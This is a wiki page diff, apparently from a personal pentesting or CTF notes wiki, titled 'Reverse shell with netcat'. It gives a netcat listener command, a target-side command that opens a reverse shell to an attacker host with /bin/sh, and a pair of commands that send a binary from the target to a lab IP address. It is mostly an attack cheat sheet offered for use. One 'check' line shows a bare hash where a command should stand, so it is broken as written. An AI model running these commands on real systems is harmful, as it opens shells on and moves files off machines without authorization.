Difference between revisions of "Reverse shell with netcat"
Jump to navigation
Jump to search
Rafahsolis (talk | contribs) (Created page with "Attacbox: nc -lvp 4444 Target: nc attackip 4444 -e /bin/sh") |
Rafahsolis (talk | contribs) m Tag: visualeditor |
||
| (One intermediate revision by the same user not shown) | |||
| Line 1: | Line 1: | ||
| − | Attacbox: | + | <syntaxhighlight lang="bash"> |
| − | + | # Attacbox: | |
| + | nc -lvnp 4444 | ||
| − | Target: | + | # Target: |
| − | + | nc attackip 4444 -e /bin/sh | |
| + | </syntaxhighlight> | ||
| + | |||
| + | ==Transfer file over netcat== | ||
| + | <syntaxhighlight lang="bash"> | ||
| + | $ nc -l -p 9999 > ovrfl # Receive (Atacker Machine) | ||
| + | $ nc -w 5 10.10.14.22 9999 < /usr/local/bin/ovrflw # Send (Target machine) | ||
| + | $ 0e531949d891fd56a2ead07610cc5ded ovrfl # Check it is the same on both machines | ||
| + | </syntaxhighlight> | ||
| + | |||
| + | == Upgrading netcat shells == | ||
| + | https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/#method3upgradingfromnetcatwithmagic | ||
Latest revision as of 19:13, 19 January 2020
# Attacbox:
nc -lvnp 4444
# Target:
nc attackip 4444 -e /bin/sh
Transfer file over netcat[edit]
$ nc -l -p 9999 > ovrfl # Receive (Atacker Machine)
$ nc -w 5 10.10.14.22 9999 < /usr/local/bin/ovrflw # Send (Target machine)
$ 0e531949d891fd56a2ead07610cc5ded ovrfl # Check it is the same on both machines